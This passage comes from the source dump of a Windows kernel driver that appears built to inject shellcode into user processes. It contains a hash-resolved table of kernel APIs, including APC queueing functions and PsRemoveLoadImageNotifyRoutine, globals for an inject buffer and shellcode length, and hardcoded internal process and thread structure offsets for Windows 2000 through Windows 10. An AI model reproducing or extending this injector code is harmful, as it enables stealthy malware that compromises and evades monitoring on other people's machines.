96 | ULONG My_KeInitializeApc_HashValue;
97 |
98 | KEINSERTQUEUEAPC My_KeInsertQueueApc;
99 | ULONG My_KeInsertQueueApc_HashValue;
100 |
101 | KEGETCURRENTTHREAD My_KeGetCurrentThread;
102 | ULONG My_KeGetCurrentThread_HashValue;
103 |
104 | PSGETPROCESSIMAGEFILENAME My_PsGetProcessImageFileName;
105 | ULONG My_PsGetProcessImageFileName_HashValue;
106 |
107 | PSREMOVELOADIMAGENOTIFYROUTINE My_PsRemoveLoadImageNotifyRoutine;
108 | ULONG My_PsRemoveLoadImageNotifyRoutine_HashValue;
109 |
110 | PSGETVERSION My_PsGetVersion;
111 | ULONG My_PsGetVerion_HashValue;
112 |
113 | MMISADDRESSVALID My_MmIsAddressValid;
114 | ULONG My_MmIsAddressValid_HashValue;
115 |
116 | OBOPENOBJECTBYPOINTER My_ObOpenObjectByPointer;
117 | ULONG My_ObOpenObjectByPointer_HashValue;
118 |
119 | ZWQUERYINFORMATIONTHREAD My_ZwQueryInformationThread;
120 | ULONG My_ZwQueryInformationThread_HashValue;
121 |
122 | ZWQUERYINFORMATIONPROCESS My_ZwQueryInformationProcess;
123 | ULONG My_ZwQueryInformationProcess_HashValue;
124 |
125 | PSLOOKUPPROCESSBYPROCESSID My_PsLookupThreadByThreadId;
126 | ULONG My_PsLookupThreadByThreadId_HashValue;
127 |
128 | IOTHREADTOPROCESS My_IoThreadToProcess;
129 | ULONG My_IoThreadToProcess_HashValue;
130 |
131 | IOALLOCATEMDL My_IoAllocateMdl;
132 | ULONG My_IoAllocateMdl_HashValue;
133 |
134 | MMPROBEANDLOCKPAGES My_MmProbeAndLockPages;
135 | ULONG My_MmProbeAndLockPages_HashValue;
136 |
137 | MMMAPLOCKEDPAGESSPECIFYCACHE My_MmMapLockedPagesSpecifyCache;
138 | ULONG My_MmMapLockedPagesSpecifyCache_HashValue;
139 |
140 | MMUNLOCKPAGES My_MmUnlockPages;
141 | ULONG My_MmUnlockPages_HashValue;
142 |
143 | IOFREEMDL My_IoFreeMdl;
144 | ULONG My_IoFreeMdl_HashValue;
145 |
146 | KEBUGCHECKEX My_KeBugCheckEx;
147 | ULONG My_KeBugCheckEx_HashValue;
148 |
149 | MMGETSYSTEMROUTINEADDRESS My_MmGetSystemRoutineAddress;
150 | ULONG My_MmGetSystemRoutineAddress_HashValue;
151 |
152 | RTLINITUNICODESTRING My_RtlInitUnicodeString;
153 | ULONG My_RtlInitUnicodeString_HashValue;
154 |
155 | RTLDECOMPRESSBUFFER My_RtlDecompressBuffer;
156 | ULONG My_RtlDecompressBuffer_HashValue;
157 |
158 | //WCSSTR My_Wcsstr;
159 | //ULONG My_Wcsstr_HashValue;
160 |
161 |
162 | ULONG_PTR ulEndApiSaveAddress;
163 | ULONG ulEndApiHashValue;
164 | }FUNCTION_DAT,*PFUNCTION_DAT;
165 | #pragma pack()
166 |
167 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj,PUNICODE_STRING pUniRegister);
168 |
169 | extern PFUNCTION_DAT g_pFunctionDat;
170 | //extern ULONG_PTR *g_ulNtoskrnlBase;
171 | extern BOOLEAN g_bInjectProcessFlag;
172 | extern PVOID g_pInjectBuffer;
173 | extern ULONG g_ulInjectShellCodeLength;
174 | //extern PVOID g_pInjectShellCode;
175 | extern KEDELAYEXECUTIONTHREAD g_KeDelayExecutionThread;
176 | #ifndef _WIN64
177 | extern KEQUERYSYSTEMTIME g_KeQuerySystemTime;
178 | #endif
179 | extern EXSYSTEMTIMETOLOCALTIME g_ExSystemTimeToLocalTime;
180 |
181 | #endif
--------------------------------------------------------------------------------
/InitializeInjectRelevantInfo.c:
--------------------------------------------------------------------------------
1 | #include "DrvCfg.h"
2 | #include "KernelApi.h"
3 | #include "Utils.h"
4 | #include "InitializeInjectRelevantInfo.h"
5 |
6 | INJECT_RELEVANT_OFFSET g_InjectRelevantOffset = {0};
7 |
8 | NTSTATUS IsWindows64Bits(PVOID pCurProcess)
9 | {
10 | NTSTATUS Status;
11 | HANDLE hProcess;
12 | ULONG_PTR ulIsWow64Process;
13 | ULONG ulRetLength;
14 |
15 | ulIsWow64Process = 0;
16 | Status = g_pFunctionDat->My_ObOpenObjectByPointer(pCurProcess,OBJ_KERNEL_HANDLE,NULL,PROCESS_ALL_ACCESS,NULL,KernelMode,&hProcess);
17 | if (NT_ERROR(Status))
18 | {
19 | return Status;
20 | }
21 | Status = g_pFunctionDat->My_ZwQueryInformationProcess(hProcess,ProcessWow64Information,&ulIsWow64Process,sizeof(ULONG_PTR),&ulRetLength);
22 | if (NT_ERROR(Status))
23 | {
24 | return Status;
25 | }
26 | if (ulIsWow64Process)
27 | {
28 | return 0x64;
29 | }
30 | else
31 | {
32 | return 0x86;
33 | }
34 | return Status;
35 | }
36 | BOOLEAN InitializeWindows2k(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
37 | {
38 | if (NULL == pInjectRelevantOffset)
39 | {
40 | return FALSE;
41 | }
42 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = FALSE;
43 | pInjectRelevantOffset->WindowsVersion.bIsWindows2000 = TRUE;
44 | pInjectRelevantOffset->ulOffsetPeb = 0x00;
45 | pInjectRelevantOffset->ulOffsetName = 0x01FC;
46 | pInjectRelevantOffset->ulOffsetFlink = 0x00;
47 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x00;
48 | pInjectRelevantOffset->ulOffsetPid = 0x00;
49 |
50 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x00;
51 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x00;
52 | pInjectRelevantOffset->ulOffsetCid = 0x00;
53 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x00;
54 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x00;
55 |
56 | pInjectRelevantOffset->ulOffsetAlertable = 0x0158;
57 | pInjectRelevantOffset->ulOffsetApcState = 0x0034;
58 |
59 | return TRUE;
60 | }
61 | BOOLEAN InitializeWindowsXp(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
62 | {
63 | if (NULL == pInjectRelevantOffset)
64 | {
65 | return FALSE;
66 | }
67 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = FALSE;
68 | pInjectRelevantOffset->WindowsVersion.bIsWindowsXp = TRUE;
69 | pInjectRelevantOffset->ulOffsetPeb = 0x1B0;
70 | pInjectRelevantOffset->ulOffsetName = 0x174;
71 | pInjectRelevantOffset->ulOffsetFlink = 0x88;
72 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x190;
73 | pInjectRelevantOffset->ulOffsetPid = 0x84;
74 |
75 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x1b9;
76 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x248;
77 | pInjectRelevantOffset->ulOffsetCid = 0x1ec;
78 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x134;
79 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x22c;
80 | pInjectRelevantOffset->ulOffsetTeb = 0x20;
81 | pInjectRelevantOffset->ulOffsetAlertable = 0x0164;
82 | pInjectRelevantOffset->ulOffsetApcState = 0x0034;
83 |
84 | pInjectRelevantOffset->ulOffsetPebLdr = 0x0c;
85 | pInjectRelevantOffset->ulOffsetPebModuleListEntry = 0x0c;
86 |
87 | pInjectRelevantOffset->ulOffsetActivationContextStackPointer = 0x1A8;
88 |
89 | return TRUE;
90 | }
91 | BOOLEAN InitializeWindows2003(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
92 | {
93 | if (NULL == pInjectRelevantOffset)
94 | {
95 | return FALSE;
96 | }
97 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = FALSE;
98 | pInjectRelevantOffset->WindowsVersion.bIsWindows2003 = TRUE;
99 | pInjectRelevantOffset->ulOffsetPeb = 0x00;
100 | pInjectRelevantOffset->ulOffsetName = 0x00;
101 | pInjectRelevantOffset->ulOffsetFlink = 0x00;
102 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x00;
103 | pInjectRelevantOffset->ulOffsetPid = 0x00;
104 |
105 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x00;
106 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x00;
107 | pInjectRelevantOffset->ulOffsetCid = 0x00;
108 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x00;
109 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x00;
110 | pInjectRelevantOffset->ulOffsetTeb = 0x20;
111 | pInjectRelevantOffset->ulOffsetAlertable = 0x0154;
112 | pInjectRelevantOffset->ulOffsetApcState = 0x0034;
113 |
114 | pInjectRelevantOffset->ulOffsetPebLdr = 0x0c;
115 | pInjectRelevantOffset->ulOffsetPebModuleListEntry = 0x0c;
116 |
117 | pInjectRelevantOffset->ulOffsetActivationContextStackPointer = 0x1A8;
118 |
119 |
120 | return TRUE;
121 | }
122 | NTSTATUS InitializeWindows7(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
123 | {
124 | NTSTATUS Status;
125 |
126 | if (NULL == pInjectRelevantOffset)
127 | {
128 | return FALSE;
129 | }
130 | pInjectRelevantOffset->WindowsVersion.bIsWindows7 = TRUE;
131 | Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
132 | if (Status == 0x86)
133 | {
134 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = FALSE;
135 | pInjectRelevantOffset->ulOffsetPeb = 0x01a8;
136 | pInjectRelevantOffset->ulOffsetName = 0x016c;
137 | pInjectRelevantOffset->ulOffsetFlink = 0x00b8;
138 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x188;
139 | pInjectRelevantOffset->ulOffsetPid = 0xB4;
140 |
141 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x188;
142 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x280;
143 | pInjectRelevantOffset->ulOffsetCid = 0x22c;
144 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x128;
145 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x268;
146 | pInjectRelevantOffset->ulOffsetTeb = 0x88;
147 | pInjectRelevantOffset->ulOffsetAlerted = 0x3A;
148 | pInjectRelevantOffset->ulOffsetAlertable = 0x3C;
149 | pInjectRelevantOffset->ulOffsetApcState = 0x40;
150 |
151 | pInjectRelevantOffset->ulOffsetPebLdr = 0x0c;
152 | pInjectRelevantOffset->ulOffsetPebModuleListEntry = 0x0c;
153 |
154 | pInjectRelevantOffset->ulOffsetActivationContextStackPointer = 0x1A8;
155 | return TRUE;
156 | }
157 | else if (Status == 0x64)
158 | {
159 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = TRUE;
160 | pInjectRelevantOffset->ulOffsetPeb = 0x330 + 0x08;
161 | pInjectRelevantOffset->ulOffsetName = 0x2d8 + 0x08;
162 | pInjectRelevantOffset->ulOffsetFlink = 0x188;
163 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x30;
164 | pInjectRelevantOffset->ulOffsetPid = 0x180;
165 |
166 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x26c;
167 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x448;
168 | pInjectRelevantOffset->ulOffsetCid = 0x3b0;
169 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x1d8;
170 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x2f8;
171 | pInjectRelevantOffset->ulOffsetTeb = 0x0b8;
172 | pInjectRelevantOffset->ulOffsetAlerted = 0x4A;
173 | pInjectRelevantOffset->ulOffsetAlertable = 0x4C;
174 | pInjectRelevantOffset->ulOffsetApcState = 0x50;
175 |
176 | pInjectRelevantOffset->ulOffsetPebLdr = 0x18;
177 | pInjectRelevantOffset->ulOffsetPebModuleListEntry = 0x10;
178 |
179 | pInjectRelevantOffset->ulOffsetActivationContextStackPointer = 0x2c8;
180 | return TRUE;
181 | }
182 | else
183 | {
184 | }
185 | if (NT_ERROR(Status))
186 | {
187 | return FALSE;
188 | }
189 | return Status;
190 | }
191 | NTSTATUS InitializeWindows8_1(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
192 | {
193 | NTSTATUS Status;
194 |
195 | if (NULL == pInjectRelevantOffset)
196 | {
197 | return FALSE;
198 | }
199 | pInjectRelevantOffset->WindowsVersion.bIsWindows81 = TRUE;
200 | Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
201 | if (Status == 0x86)
202 | {
203 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = FALSE;
204 | pInjectRelevantOffset->ulOffsetPeb = 0x140;
205 | pInjectRelevantOffset->ulOffsetName = 0x170;
206 | pInjectRelevantOffset->ulOffsetFlink = 0x0b8;
207 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x194;
208 | pInjectRelevantOffset->ulOffsetPid = 0xB4;
209 |
210 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x18c;
211 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x3b8;
212 | pInjectRelevantOffset->ulOffsetCid = 0x364;
213 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x06c;
214 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x39c;
215 | pInjectRelevantOffset->ulOffsetTeb = 0xa8;
216 | pInjectRelevantOffset->ulOffsetAlerted = 0x56;
217 | pInjectRelevantOffset->ulOffsetAlertable = 0x58;
218 | pInjectRelevantOffset->ulOffsetApcState = 0x70;
219 |
220 |
221 | pInjectRelevantOffset->ulOffsetPebLdr = 0x0c;
222 | pInjectRelevantOffset->ulOffsetPebModuleListEntry = 0x0c;
223 | pInjectRelevantOffset->ulOffsetActivationContextStackPointer = 0x1A8;
224 | return TRUE;
225 | }
226 | else if (Status == 0x64)
227 | {
228 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = TRUE;
229 | pInjectRelevantOffset->ulOffsetPeb = 0x330;
230 | pInjectRelevantOffset->ulOffsetName = 0x2d8;
231 | pInjectRelevantOffset->ulOffsetFlink = 0x188;
232 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x300;
233 | pInjectRelevantOffset->ulOffsetPid = 0x180;
234 |
235 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x26c;
236 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x448;
237 | pInjectRelevantOffset->ulOffsetCid = 0x3b0;
238 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x1d8;
239 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x030;
240 | pInjectRelevantOffset->ulOffsetAlerted = 0x72;
241 | pInjectRelevantOffset->ulOffsetAlertable = 0x74;
242 | pInjectRelevantOffset->ulOffsetApcState = 0x98;
243 | return TRUE;
244 | }
245 | else
246 | {
247 | }
248 | if (NT_ERROR(Status))
249 | {
250 | return FALSE;
251 | }
252 | return Status;
253 | }
254 | NTSTATUS InitializeWindows8(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
255 | {
256 | NTSTATUS Status;
257 |
258 | if (NULL == pInjectRelevantOffset)
259 | {
260 | return FALSE;
261 | }
262 | pInjectRelevantOffset->WindowsVersion.bIsWindows8 = TRUE;
263 | Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
264 | if (Status == 0x86)
265 | {
266 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = FALSE;
267 | pInjectRelevantOffset->ulOffsetPeb = 0x140;
268 | pInjectRelevantOffset->ulOffsetName = 0x170;
269 | pInjectRelevantOffset->ulOffsetFlink = 0x0b8;
270 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x194;
271 | pInjectRelevantOffset->ulOffsetPid = 0xB4;
272 |
273 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x18c;
274 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x268;
275 | pInjectRelevantOffset->ulOffsetCid = 0x214;
276 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x06c;
277 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x24c;
278 | pInjectRelevantOffset->ulOffsetTeb = 0xa8;
279 | pInjectRelevantOffset->ulOffsetAlerted = 0x56;
280 | pInjectRelevantOffset->ulOffsetAlertable = 0x58;
281 | pInjectRelevantOffset->ulOffsetApcState = 0x70;
282 |
283 |
284 | pInjectRelevantOffset->ulOffsetPebLdr = 0x0c;
285 | pInjectRelevantOffset->ulOffsetPebModuleListEntry = 0x0c;
286 | pInjectRelevantOffset->ulOffsetActivationContextStackPointer = 0x1A8;
287 | return TRUE;
288 | }
289 | else if (Status == 0x64)
290 | {
291 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = TRUE;
292 | pInjectRelevantOffset->ulOffsetPeb = 0x330;
293 | pInjectRelevantOffset->ulOffsetName = 0x2d8;
294 | pInjectRelevantOffset->ulOffsetFlink = 0x188;
295 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x300;
296 | pInjectRelevantOffset->ulOffsetPid = 0x180;
297 |
298 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x26c;
299 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x448;
300 | pInjectRelevantOffset->ulOffsetCid = 0x3b0;
301 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x1d8;
302 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x030;
303 | pInjectRelevantOffset->ulOffsetAlerted = 0x72;
304 | pInjectRelevantOffset->ulOffsetAlertable = 0x74;
305 | pInjectRelevantOffset->ulOffsetApcState = 0x98;
306 | return TRUE;
307 | }
308 | else
309 | {
310 | }
311 | if (NT_ERROR(Status))
312 | {
313 | return FALSE;
314 | }
315 | return Status;
316 | }
317 | NTSTATUS InitializeWindows10(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
318 | {
319 | NTSTATUS Status;
320 |
321 | if (NULL == pInjectRelevantOffset)
322 | {
323 | return FALSE;
324 | }
325 | pInjectRelevantOffset->WindowsVersion.bIsWindows10 = TRUE;
326 | Status = IsWindows64Bits(g_pFunctionDat->My_IoGetCurrentProcess());
327 | if (Status == 0x86)
328 | {
329 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = FALSE;
330 | pInjectRelevantOffset->ulOffsetPeb = 0x144;
331 | pInjectRelevantOffset->ulOffsetName = 0x174;
332 | pInjectRelevantOffset->ulOffsetFlink = 0x0b8;
333 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x198;
334 | pInjectRelevantOffset->ulOffsetPid = 0xB4;
335 |
336 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x18c;
337 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x3c8;
338 | pInjectRelevantOffset->ulOffsetCid = 0x374;
339 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x06c;
340 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x3ac;
341 | pInjectRelevantOffset->ulOffsetTeb = 0xa8;
342 |
343 | pInjectRelevantOffset->ulOffsetPebLdr = 0x0c;
344 | pInjectRelevantOffset->ulOffsetPebModuleListEntry = 0x0c;
345 |
346 | pInjectRelevantOffset->ulOffsetActivationContextStackPointer = 0x1A8;
347 | return TRUE;
348 | }
349 | else if (Status == 0x64)
350 | {
351 | pInjectRelevantOffset->WindowsVersion.bIs64Bit = TRUE;
352 | pInjectRelevantOffset->ulOffsetPeb = 0x330;
353 | pInjectRelevantOffset->ulOffsetName = 0x2d8;
354 | pInjectRelevantOffset->ulOffsetFlink = 0x188;
355 | pInjectRelevantOffset->ulOffsetThreadListHead = 0x300;
356 | pInjectRelevantOffset->ulOffsetPid = 0x180;
357 |
358 | pInjectRelevantOffset->ulOffsetSuspendCount = 0x26c;
359 | pInjectRelevantOffset->ulOffsetCrossThreadFlags = 0x448;
360 | pInjectRelevantOffset->ulOffsetCid = 0x3b0;
361 | pInjectRelevantOffset->ulOffsetTrapFrame = 0x1d8;
362 | pInjectRelevantOffset->ulOffsetThreadListEntry = 0x030;
363 | return TRUE;
364 | }
365 | else
366 | {
367 | }
368 | if (NT_ERROR(Status))
369 | {
370 | return FALSE;
371 | }
372 | return Status;
373 | }
374 | BOOLEAN InitializeInjectInformation(PINJECT_RELEVANT_OFFSET pInjectRelevantOffset)
375 | {
376 | SYSTEM_VERSION SystemVersion;
377 |
378 | CleanZero((PUCHAR)pInjectRelevantOffset,sizeof(INJECT_RELEVANT_OFFSET));
379 | CleanZero((PUCHAR)&SystemVersion,sizeof(SYSTEM_VERSION));
380 | g_pFunctionDat->My_PsGetVersion(&SystemVersion.ulMajorVersion, \
381 | &SystemVersion.ulMinorVersion, \
382 | &SystemVersion.ulBuildNumber, \
383 | SystemVersion.unStrCSDVersion);
384 | if (SystemVersion.ulMajorVersion == 0x0A && SystemVersion.ulMinorVersion == 0)
385 | {
386 | if (InitializeWindows10(pInjectRelevantOffset) == TRUE)
387 | {
388 | return TRUE;
389 | }
390 | return FALSE;
391 | }
392 | else if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 3)
393 | {
394 | if (InitializeWindows8_1(pInjectRelevantOffset) == TRUE)
395 | {
396 | return TRUE;
397 | }
398 | return FALSE;
399 | }
400 | else if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 2)
401 | {
402 | if (InitializeWindows8(pInjectRelevantOffset) == TRUE)
403 | {
404 | return TRUE;
405 | }
406 | return FALSE;
407 | }
408 | else if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 1)
409 | {
410 | if (InitializeWindows7(pInjectRelevantOffset) == TRUE)
411 | {
412 | return TRUE;
413 | }
414 | return FALSE;
415 | }
416 | else if (SystemVersion.ulMajorVersion == 6 && SystemVersion.ulMinorVersion == 0)
417 | {
418 | if (SystemVersion.ulBuildNumber == 6001)
419 | {
420 | //DbgPrint(" Sp 1\r\n");
421 | }
422 | else if (SystemVersion.ulBuildNumber == 6002)
423 | {
424 | //DbgPrint(" Sp 2\r\n");
425 | }
426 | else
427 | {
428 | //DbgPrint("\r\n");
429 | }
430 |
431 | }
432 | else if (SystemVersion.ulMajorVersion == 5 && SystemVersion.ulMinorVersion == 2)
433 | {
434 | if (InitializeWindows2003(pInjectRelevantOffset) == TRUE)
435 | {
436 | return TRUE;
437 | }
438 | return FALSE;
439 |
440 | }
441 | else if (SystemVersion.ulMajorVersion == 5 && SystemVersion.ulMinorVersion == 1)
442 | {
443 | if (InitializeWindowsXp(pInjectRelevantOffset) == TRUE)
444 | {
445 | return TRUE;
446 | }
447 | return FALSE;
448 | }
449 | else if (SystemVersion.ulMajorVersion == 5 && SystemVersion.ulMinorVersion == 0)
450 | {
451 | if (InitializeWindows2k(pInjectRelevantOffset) == TRUE)
452 | {
453 | return TRUE;
454 | }
455 | return FALSE;
456 | }
457 | else if (SystemVersion.ulMajorVersion == 4 && SystemVersion.ulMinorVersion == 0)
458 | {
459 | }
460 | return FALSE;
461 | }
462 |
--------------------------------------------------------------------------------
/KernelApi.h:
--------------------------------------------------------------------------------
1 | #ifndef __KERNEL_API_H__
2 | #define __KERNEL_API_H__
3 |
4 | #define PROCESS_TERMINATE (0x0001)
5 | #define PROCESS_CREATE_THREAD (0x0002)
6 | #define PROCESS_SET_SESSIONID (0x0004)
7 | #define PROCESS_VM_OPERATION (0x0008)
8 | #define PROCESS_VM_READ (0x0010)
9 | #define PROCESS_VM_WRITE (0x0020)
10 | #define PROCESS_DUP_HANDLE (0x0040)
11 | #define PROCESS_CREATE_PROCESS (0x0080)
12 | #define PROCESS_SET_QUOTA (0x0100)
13 | #define PROCESS_SET_INFORMATION (0x0200)
14 | #define PROCESS_QUERY_INFORMATION (0x0400)
15 | #define PROCESS_SUSPEND_RESUME (0x0800)
16 | #define PROCESS_QUERY_LIMITED_INFORMATION (0x1000)
17 |
18 |
19 |
20 | typedef enum _SYSTEM_INFORMATION_CLASS {
21 | SystemBasicInformation, // 0
22 | SystemProcessorInformation, // 1 obsolete...delete
23 | SystemPerformanceInformation, // 2
24 | SystemTimeOfDayInformation, // 3
25 | SystemPathInformation, // 4
26 | SystemProcessInformation, // 5
27 | SystemCallCountInformation, // 6
28 | SystemDeviceInformation, // 7
29 | SystemProcessorPerformanceInformation, // 8
30 | SystemFlagsInformation, // 9
31 | SystemCallTimeInformation, // 10
32 | SystemModuleInformation, // 11
33 | SystemLocksInformation, // 12
34 | SystemStackTraceInformation, // 13
35 | SystemPagedPoolInformation, // 14
36 | SystemNonPagedPoolInformation, // 15
37 | SystemHandleInformation, // 16
38 | SystemObjectInformation, // 17
39 | SystemPageFileInformation, // 18
40 | SystemVdmInstemulInformation, // 19
41 | SystemVdmBopInformation, // 20
42 | SystemFileCacheInformation, // 21
43 | SystemPoolTagInformation, // 22
44 | SystemInterruptInformation, // 23
45 | SystemDpcBehaviorInformation, // 24
46 | SystemFullMemoryInformation, // 25
47 | SystemLoadGdiDriverInformation, // 26
48 | SystemUnloadGdiDriverInformation, // 27
49 | SystemTimeAdjustmentInformation, // 28
50 | SystemSummaryMemoryInformation, // 29
51 | SystemMirrorMemoryInformation, // 30
52 | SystemPerformanceTraceInformation, // 31
53 | SystemObsolete0, // 32
54 | SystemExceptionInformation, // 33
55 | SystemCrashDumpStateInformation, // 34
56 | SystemKernelDebuggerInformation, // 35
57 | SystemContextSwitchInformation, // 36
58 | SystemRegistryQuotaInformation, // 37
59 | SystemExtendServiceTableInformation, // 38
60 | SystemPrioritySeperation, // 39
61 | SystemVerifierAddDriverInformation, // 40
62 | SystemVerifierRemoveDriverInformation, // 41
63 | SystemProcessorIdleInformation, // 42
64 | SystemLegacyDriverInformation, // 43
65 | SystemCurrentTimeZoneInformation, // 44
66 | SystemLookasideInformation, // 45
67 | SystemTimeSlipNotification, // 46
68 | SystemSessionCreate, // 47
69 | SystemSessionDetach, // 48
70 | SystemSessionInformation, // 49
71 | SystemRangeStartInformation, // 50
72 | SystemVerifierInformation, // 51
73 | SystemVerifierThunkExtend, // 52
74 | SystemSessionProcessInformation, // 53
75 | SystemLoadGdiDriverInSystemSpace, // 54
76 | SystemNumaProcessorMap, // 55
77 | SystemPrefetcherInformation, // 56
78 | SystemExtendedProcessInformation, // 57
79 | SystemRecommendedSharedDataAlignment, // 58
80 | SystemComPlusPackage, // 59
81 | SystemNumaAvailableMemory, // 60
82 | SystemProcessorPowerInformation, // 61
83 | SystemEmulationBasicInformation, // 62
84 | SystemEmulationProcessorInformation, // 63
85 | SystemExtendedHandleInformation, // 64
86 | SystemLostDelayedWriteInformation, // 65
87 | SystemBigPoolInformation, // 66
88 | SystemSessionPoolTagInformation, // 67
89 | SystemSessionMappedViewInformation, // 68
90 | SystemHotpatchInformation, // 69
91 | SystemObjectSecurityMode, // 70
92 | SystemWatchdogTimerHandler, // 71
93 | SystemWatchdogTimerInformation, // 72
94 | SystemLogicalProcessorInformation, // 73
95 | SystemWow64SharedInformation, // 74
96 | SystemRegisterFirmwareTableInformationHandler, // 75
97 | SystemFirmwareTableInformation, // 76
98 | SystemModuleInformationEx, // 77
99 | SystemVerifierTriageInformation, // 78
100 | SystemSuperfetchInformation, // 79
101 | SystemMemoryListInformation, // 80
102 | SystemFileCacheInformationEx, // 81
103 | MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum
104 | } SYSTEM_INFORMATION_CLASS;
105 |
106 | typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
107 | HANDLE Section;
108 | PVOID MappedBase;
109 | PVOID Base;
110 | ULONG Size;
111 | ULONG Flags;
112 | USHORT LoadOrderIndex;
113 | USHORT InitOrderIndex;
114 | USHORT LoadCount;
115 | USHORT PathLength;
116 | CHAR ImageName[256];
117 | } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
118 |
119 | typedef struct _SYSTEM_MODULE_INFORMATION {
120 | ULONG Count;
121 | SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
122 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
123 |
124 | typedef struct _SYSTEM_PROCESS_INFORMATION {
125 | ULONG NextEntryOffset;
126 | ULONG NumberOfThreads;
127 | LARGE_INTEGER SpareLi1;
128 | LARGE_INTEGER SpareLi2;
129 | LARGE_INTEGER SpareLi3;
130 | LARGE_INTEGER CreateTime;
131 | LARGE_INTEGER UserTime;
132 | LARGE_INTEGER KernelTime;
133 | UNICODE_STRING ImageName;
134 | KPRIORITY BasePriority;
135 | HANDLE UniqueProcessId;
136 | HANDLE InheritedFromUniqueProcessId;
137 | ULONG HandleCount;
138 | ULONG SessionId;
139 | ULONG_PTR PageDirectoryBase;
140 | SIZE_T PeakVirtualSize;
141 | SIZE_T VirtualSize;
142 | ULONG PageFaultCount;
143 | SIZE_T PeakWorkingSetSize;
144 | SIZE_T WorkingSetSize;
145 | SIZE_T QuotaPeakPagedPoolUsage;
146 | SIZE_T QuotaPagedPoolUsage;
147 | SIZE_T QuotaPeakNonPagedPoolUsage;
148 | SIZE_T QuotaNonPagedPoolUsage;
149 | SIZE_T PagefileUsage;
150 | SIZE_T PeakPagefileUsage;
151 | SIZE_T PrivatePageCount;
152 | LARGE_INTEGER ReadOperationCount;
153 | LARGE_INTEGER WriteOperationCount;
154 | LARGE_INTEGER OtherOperationCount;
155 | LARGE_INTEGER ReadTransferCount;
156 | LARGE_INTEGER WriteTransferCount;
157 | LARGE_INTEGER OtherTransferCount;
158 | } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
159 |
160 | typedef struct _SYSTEM_THREAD_INFORMATION {
161 | LARGE_INTEGER KernelTime;
162 | LARGE_INTEGER UserTime;
163 | LARGE_INTEGER CreateTime;
164 | ULONG WaitTime;
165 | PVOID StartAddress;
